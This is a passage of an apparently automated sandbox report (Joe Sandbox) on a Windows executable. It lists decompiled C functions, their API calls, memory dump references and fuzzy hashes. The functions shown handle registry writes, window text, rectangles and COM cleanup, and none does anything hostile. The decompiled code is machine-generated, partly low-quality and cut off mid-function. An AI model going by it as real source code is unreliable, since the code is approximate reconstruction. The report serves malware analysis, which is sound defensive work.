                                                                              • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042B991
                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0042B99A
                                                                              • wsprintfA.USER32 ref: 0042B9B6
                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0042B9CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                              • String ID:
                                                                              • API String ID: 1902064621-0
                                                                              • Opcode ID: 826149d6cc030b334b62239563747890cf79af6e66d12d299ce58bfc5f0a8ac3
                                                                              • Instruction ID: c71a7eb8571e61732146ce38d87693717e96a987b498b26b918423c2770d7d29
                                                                              • Opcode Fuzzy Hash: 826149d6cc030b334b62239563747890cf79af6e66d12d299ce58bfc5f0a8ac3
                                                                              • Instruction Fuzzy Hash: 32015271600619BBCF11AF64DE05E9F7BB9FF04704F448026FA01A7150D7B4D915DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E338, Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E0042E338(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}












                                                                              0x0042e33a
                                                                              0x0042e343
                                                                              0x0042e34c
                                                                              0x0042e35c
                                                                              0x0042e362
                                                                              0x0042e366
                                                                              0x0042e36a
                                                                              0x0042e376
                                                                              0x0042e37f
                                                                              0x00000000
                                                                              0x0042e386
                                                                              0x00000000

                                                                              APIs
                                                                              • SysStringLen.OLEAUT32(?), ref: 0042E34C
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042F4F1,00000000), ref: 0042E362
                                                                              • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042E36A
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042F4F1,00000000), ref: 0042E37F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Byte$CharMultiStringWide$Alloc
                                                                              • String ID:
                                                                              • API String ID: 3384502665-0
                                                                              • Opcode ID: 524a9a16848dfe829cda5aba65e293cdacdfee97946dccebf340836eb3b200f7
                                                                              • Instruction ID: 0d177c561ebc35b9d0ae186a0a59c693ea1574642207e252149dd4e1a5738ffc
                                                                              • Opcode Fuzzy Hash: 524a9a16848dfe829cda5aba65e293cdacdfee97946dccebf340836eb3b200f7
                                                                              • Instruction Fuzzy Hash: 3CF0FE721062787F93219B67AC48CABBF9CFE8B2A5B11452AF949C2110D6759801CBF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040D374, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E0040D374(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}





                                                                              0x0040d37f
                                                                              0x0040d382
                                                                              0x0040d3a5
                                                                              0x0040d3b2
                                                                              0x0040d384
                                                                              0x0040d38f
                                                                              0x0040d390
                                                                              0x0040d391
                                                                              0x0040d392
                                                                              0x0040d394
                                                                              0x0040d3c4
                                                                              0x0040d3d9
                                                                              0x0040d3d9
                                                                              0x0040d3e3

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                              • String ID:
                                                                              • API String ID: 3354205298-0
                                                                              • Opcode ID: b661af1b184f407ca87348843d9cadc039c6e8e96f151334bffa99b33a6900e2
                                                                              • Instruction ID: ac52aee1047fdb05690da1896c34752c5e143454f08ce81f2000444f11c0031a
                                                                              • Opcode Fuzzy Hash: b661af1b184f407ca87348843d9cadc039c6e8e96f151334bffa99b33a6900e2
                                                                              • Instruction Fuzzy Hash: 4101087290021AABCF01DFA8DD88EABB7BDFF08314F008466FE15EA151D275E5098B64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042429B, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E0042429B(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				intOrPtr _t14;
				int _t15;
				intOrPtr _t28;
				void* _t30;

				_t30 = __ecx;
				_t14 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t14 == 0) {
					if(_a4 == 0) {
						_t28 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t28 + 0x1c)) {
							SendMessageA( *(E00426406(__ebp, GetParent( *(_t28 + 0x1c))) + 0x1c), 0x28, 0, 0);
						}
					}
					_t15 = E0042845F( *((intOrPtr*)(_t30 + 0x14)), _a4);
					L8:
					 *((intOrPtr*)(_t30 + 0x18)) = 1;
					return _t15;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					asm("sbb ecx, ecx");
					_t15 = EnableMenuItem( *(_t14 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
					goto L8;
				}
				return _t14;
			}







                                                                              0x0042429c
                                                                              0x0042429e
                                                                              0x004242a3
                                                                              0x004242d3
                                                                              0x004242d6
                                                                              0x004242e2
                                                                              0x004242fc
                                                                              0x004242fc
                                                                              0x00424302
                                                                              0x0042430a
                                                                              0x0042430f
                                                                              0x0042430f
                                                                              0x00000000
                                                                              0x0042430f
                                                                              0x004242a9
                                                                              0x004242b1
                                                                              0x004242c6
                                                                              0x00000000
                                                                              0x004242c6
                                                                              0x00424317

                                                                              APIs
                                                                              • EnableMenuItem.USER32 ref: 004242C6
                                                                              • GetFocus.USER32 ref: 004242D9
                                                                              • GetParent.USER32(?), ref: 004242E7
                                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 004242FC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: EnableFocusItemMenuMessageParentSend
                                                                              • String ID:
                                                                              • API String ID: 2297321873-0
                                                                              • Opcode ID: e18b6836e4278f753236cea404f61187fcfaa90fd94312d380f75e486bdb5391
                                                                              • Instruction ID: 8bf738ed6bb06d0b298637b39d26769626752b1542a6d170bc6c9bf0e67e0af1
                                                                              • Opcode Fuzzy Hash: e18b6836e4278f753236cea404f61187fcfaa90fd94312d380f75e486bdb5391
                                                                              • Instruction Fuzzy Hash: 88017130200620EFD7289F10ED09F1ABBB5FF50711F11962EF546925F1C7B8A885CB58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004289D0, Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E004289D0(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E004128A0(E00430F33, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E00428A50())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E00401000( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}






                                                                              0x004289d5
                                                                              0x004289da
                                                                              0x004289e2
                                                                              0x00428a04
                                                                              0x00428a0c
                                                                              0x00428a13
                                                                              0x00428a14
                                                                              0x00428a23
                                                                              0x00428a2c
                                                                              0x00428a3a
                                                                              0x00428a3f
                                                                              0x004289e4
                                                                              0x004289ed
                                                                              0x004289ed
                                                                              0x00428a45
                                                                              0x00428a4d

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3022380644-0
                                                                              • Opcode ID: 707fd6c5bc3ca48145348ffe67f6fd8f573525144c28b177efa8cdd7c8d840a9
                                                                              • Instruction ID: fe3f5d958a57acb123bb3fbcc59b2cea7e084c97e97efb327222442303b1143a
                                                                              • Opcode Fuzzy Hash: 707fd6c5bc3ca48145348ffe67f6fd8f573525144c28b177efa8cdd7c8d840a9
                                                                              • Instruction Fuzzy Hash: D7015E32510114EFCF159FA4DC08BAEBBB1FF08314F00866EF51697261CBB59950DB84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E482, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041E482(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E0041E461( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E0041E461( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E0041E461( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E0041E461( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}








                                                                              0x0041e483
                                                                              0x0041e488
                                                                              0x0041e491
                                                                              0x0041e496
                                                                              0x0041e49b
                                                                              0x0041e49d
                                                                              0x0041e4a5
                                                                              0x0041e4aa
                                                                              0x0041e4af
                                                                              0x0041e4b1
                                                                              0x0041e4b1
                                                                              0x0041e4af
                                                                              0x0041e4b4
                                                                              0x0041e4c7
                                                                              0x0041e4c9
                                                                              0x0041e4c9
                                                                              0x0041e4cc
                                                                              0x0041e4df

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ___addl
                                                                              • String ID:
                                                                              • API String ID: 2260456530-0
                                                                              • Opcode ID: 3281c1e4b32675dd85907c3a2b35b22bf2374372d70f82225a36fe1e636480b6
                                                                              • Instruction ID: 208705f6e8477beb1adaa75ff631c02e2f22a10d2ccb4c98fb26752b20fa8347
                                                                              • Opcode Fuzzy Hash: 3281c1e4b32675dd85907c3a2b35b22bf2374372d70f82225a36fe1e636480b6
                                                                              • Instruction Fuzzy Hash: 72F06D7A400212EFDB105A43DC01EA7B7E9FF48304B04442AFD5C82232F726E8A8CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042ABB5, Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042ABB5(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x457184; // 0xb7aa1229
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E00412FBB(_t13, _v8);
			}







                                                                              0x0042abbe
                                                                              0x0042abc7
                                                                              0x0042abd0
                                                                              0x0042abd9
                                                                              0x0042ac0a
                                                                              0x0042ac0a
                                                                              0x0042ac1a

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow$lstrcmplstrlen
                                                                              • String ID:
                                                                              • API String ID: 330964273-0
                                                                              • Opcode ID: 8c3e5e6e83c4f47f247b0bcefc4cc00f3a05ab1aeaedd8c287c8818b5971c832
                                                                              • Instruction ID: 20c476808981e32396b1a5eba632d80cfa9b8f04381865b9799ae4853616ee20
                                                                              • Opcode Fuzzy Hash: 8c3e5e6e83c4f47f247b0bcefc4cc00f3a05ab1aeaedd8c287c8818b5971c832
                                                                              • Instruction Fuzzy Hash: ABF06D75500018BBCF21AF60EE489CEBB79EB04354F008062FD45E2220D7B8DAA0DB59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00424D03, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00424D03() {
				intOrPtr _t17;
				struct HWND__* _t19;
				intOrPtr* _t28;
				void* _t30;

				_t28 =  *((intOrPtr*)(_t30 - 0x1c));
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t30 - 0x20)) != 0) {
					EnableWindow( *(_t30 - 0x14), 1);
				}
				if( *(_t30 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t36 = _t19 -  *((intOrPtr*)(_t28 + 0x1c));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x1c))) {
						SetActiveWindow( *(_t30 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E00424760(_t28, _t36);
				if( *((intOrPtr*)(_t28 + 0x54)) != 0) {
					FreeResource( *(_t30 - 0x18));
				}
				_t17 =  *((intOrPtr*)(_t28 + 0x40));
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t17;
			}







                                                                              0x00424d03
                                                                              0x00424d08
                                                                              0x00424d0f
                                                                              0x00424d16
                                                                              0x00424d16
                                                                              0x00424d1f
                                                                              0x00424d21
                                                                              0x00424d27
                                                                              0x00424d2a
                                                                              0x00424d2f
                                                                              0x00424d2f
                                                                              0x00424d2a
                                                                              0x00424d39
                                                                              0x00424d3e
                                                                              0x00424d46
                                                                              0x00424d4b
                                                                              0x00424d4b
                                                                              0x00424d51
                                                                              0x00424d59
                                                                              0x00424d62

                                                                              APIs
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00424D16
                                                                              • GetActiveWindow.USER32 ref: 00424D21
                                                                              • SetActiveWindow.USER32(00000000,?,00000000), ref: 00424D2F
                                                                              • FreeResource.KERNEL32(00000000,?,00000000), ref: 00424D4B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Active$EnableFreeResource
                                                                              • String ID:
                                                                              • API String ID: 3751187028-0
                                                                              • Opcode ID: dd8e1cf759cf1fba278715cd4556fbf177b53c43ed9c5f88154513c8c6efafaf
                                                                              • Instruction ID: c15fcf9ff995de270b382e2080cd508acf785bddf13373212ce2609f4b242657
                                                                              • Opcode Fuzzy Hash: dd8e1cf759cf1fba278715cd4556fbf177b53c43ed9c5f88154513c8c6efafaf
                                                                              • Instruction Fuzzy Hash: E1F0AF31A00255CFCF21DFA4EA845AEFBB1FF84311F10452AE152A22A0C7795D00CE08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E734, Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E0042E734(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;

				_t10 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x45a388;
					if( *0x45a388 == 0) {
						_t5 = GetTickCount();
						 *0x45a388 =  *0x45a388 + 1;
						__eflags =  *0x45a388;
						 *0x457024 = _t5;
					}
					_t4 = GetTickCount() -  *0x457024;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x457024 = _t4;
					}
					return _t4;
				}
				return E0042E6DD(_t10, _a8);
			}





                                                                              0x0042e734
                                                                              0x0042e739
                                                                              0x0042e746
                                                                              0x0042e754
                                                                              0x0042e756
                                                                              0x0042e758
                                                                              0x0042e758
                                                                              0x0042e75e
                                                                              0x0042e75e
                                                                              0x0042e765
                                                                              0x0042e76b
                                                                              0x0042e770
                                                                              0x0042e772
                                                                              0x0042e778
                                                                              0x0042e77a
                                                                              0x0042e77a
                                                                              0x00000000
                                                                              0x0042e77f
                                                                              0x00000000

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 0042E756
                                                                              • GetTickCount.KERNEL32 ref: 0042E763
                                                                              • CoFreeUnusedLibraries.OLE32 ref: 0042E772
                                                                              • GetTickCount.KERNEL32 ref: 0042E778
                                                                                • Part of subcall function 0042E6DD: CoFreeUnusedLibraries.OLE32(00000000,0042E7BD,00000000,?,?,0040DD8B), ref: 0042E721
                                                                                • Part of subcall function 0042E6DD: OleUninitialize.OLE32(?,?,0040DD8B), ref: 0042E727
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                              • String ID:
                                                                              • API String ID: 685759847-0
                                                                              • Opcode ID: 96d8073151e37bb7f3ef1cb4b8579b07bf6f63f66bc497836e4d46781c35c349
                                                                              • Instruction ID: 95448ae544d37ef92624e5e8fb17c3d7ac4347ff59c154f277d32de88923503c
                                                                              • Opcode Fuzzy Hash: 96d8073151e37bb7f3ef1cb4b8579b07bf6f63f66bc497836e4d46781c35c349
                                                                              • Instruction Fuzzy Hash: 63E09A31D09320DBD760AF61FE4821E3BE0AB95716F800877E640822B1C7788C81DF4E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00415C6C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E00415C6C(void* __ebx, void* __ecx, void* __edi, signed int __esi) {
				void* __ebp;
				intOrPtr _t72;
				intOrPtr _t89;
				signed int _t95;
				intOrPtr _t103;
				intOrPtr* _t104;
				signed int _t105;
				signed int _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				intOrPtr* _t113;
				signed int _t116;
				intOrPtr _t127;
				signed int* _t135;
				signed int _t137;
				void* _t138;
				void* _t140;

				_t137 = __esi;
				_t138 = _t140 - 0x74;
				_t72 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t138 + 0x70)) = _t72;
				_push(__esi);
				if(E00415B10(__ebx, __edi, __esi,  *((intOrPtr*)(_t138 + 0x7c)), _t138 - 0x14, _t138 - 0x138, _t138 - 0x11c) == 0) {
					L29:
					return E00412FBB(_t76,  *((intOrPtr*)(_t138 + 0x70)));
				}
				_push(__ebx);
				_t116 = __esi + __esi * 2 << 2;
				if(E00416EE0(_t138 - 0x14,  *(_t116 + 0x4576cc)) != 0) {
					_t76 = E00412247(E00411A30(_t138 - 0x14) + 1);
					__eflags = _t76;
					 *(_t138 - 0x124) = _t76;
					if(_t76 == 0) {
						L28:
						goto L29;
					}
					_push(__edi);
					 *(_t138 - 0x120) =  *(_t116 + 0x4576cc);
					_t135 = 0x45a728 + __esi * 4;
					 *(_t138 - 0x13c) =  *_t135;
					 *(_t138 - 0x118) = 0x45a864 + (__esi + __esi * 2) * 2;
					E00411AC0(_t138 - 0x14c, 0x45a864 + (__esi + __esi * 2) * 2, 6);
					_t89 =  *0x45a740; // 0x0
					 *((intOrPtr*)(_t138 - 0x128)) = _t89;
					 *(_t116 + 0x4576cc) = E00419460( *(_t138 - 0x124), _t138 - 0x14);
					 *_t135 =  *(_t138 - 0x138) & 0x0000ffff;
					E00411AC0( *(_t138 - 0x118), _t138 - 0x138, 6);
					__eflags = __esi - 2;
					if(__esi != 2) {
						L20:
						__eflags = _t137 - 1;
						if(_t137 == 1) {
							 *0x45a744 =  *((intOrPtr*)(_t138 - 0x11c));
						}
						_t95 =  *((intOrPtr*)(_t116 + 0x4576d0))();
						__eflags = _t95;
						if(_t95 == 0) {
							__eflags =  *(_t138 - 0x120) - 0x457530;
							if( *(_t138 - 0x120) != 0x457530) {
								_push( *(_t138 - 0x120));
								E00412A4D();
							}
							_t76 =  *(_t116 + 0x4576cc);
						} else {
							_push( *(_t138 - 0x124));
							 *(_t116 + 0x4576cc) =  *(_t138 - 0x120);
							E00412A4D();
							 *_t135 =  *(_t138 - 0x13c);
							 *0x45a740 =  *((intOrPtr*)(_t138 - 0x128));
							_t76 = 0;
						}
						goto L28;
					}
					_t126 =  *0x4575b0; // 0x0
					_t33 = _t138 - 0x118;
					 *_t33 =  *(_t138 - 0x118) & 0x00000000;
					__eflags =  *_t33;
					 *0x45a740 =  *((intOrPtr*)(_t138 - 0x11c));
					_t103 =  *0x4575b4; // 0x0
					 *((intOrPtr*)(_t138 - 0x12c)) = _t103;
					_t104 = 0x457590;
					while(1) {
						__eflags =  *((intOrPtr*)(_t138 - 0x11c)) -  *_t104;
						if( *((intOrPtr*)(_t138 - 0x11c)) ==  *_t104) {
							break;
						}
						 *(_t138 - 0x118) =  *(_t138 - 0x118) + 1;
						 *_t104 = _t126;
						 *((intOrPtr*)(_t138 - 0x144)) =  *_t104;
						_t41 = _t104 + 4; // 0x1
						 *((intOrPtr*)(_t104 + 4)) =  *((intOrPtr*)(_t138 - 0x12c));
						_t126 =  *((intOrPtr*)(_t138 - 0x144));
						_t104 = _t104 + 8;
						__eflags = _t104 - 0x4575b8;
						 *((intOrPtr*)(_t138 - 0x12c)) =  *_t41;
						if(_t104 < 0x4575b8) {
							continue;
						}
						L11:
						__eflags =  *(_t138 - 0x118) - 5;
						if(__eflags != 0) {
							_t106 =  *0x457594; // 0x1
							L19:
							 *0x457870 = _t106;
							goto L20;
						}
						_push(1);
						_push( *0x45a730);
						_push( *((intOrPtr*)(_t138 - 0x11c)));
						_push(_t138 - 0x114);
						_push(0x7f);
						_push(0x44be38);
						_push(1);
						_t108 = E00419914(_t116, _t126, _t135, _t137, __eflags);
						__eflags = _t108;
						if(_t108 == 0) {
							_t106 = 0;
							__eflags = 0;
							L17:
							_t127 =  *0x45a740; // 0x0
							 *0x457594 = _t106;
							 *0x457590 = _t127;
							goto L19;
						}
						_t109 = 0;
						__eflags = 0;
						do {
							 *(_t138 + _t109 * 2 - 0x113) =  *(_t138 + _t109 * 2 - 0x113) & 0x00000001;
							_t109 = _t109 + 1;
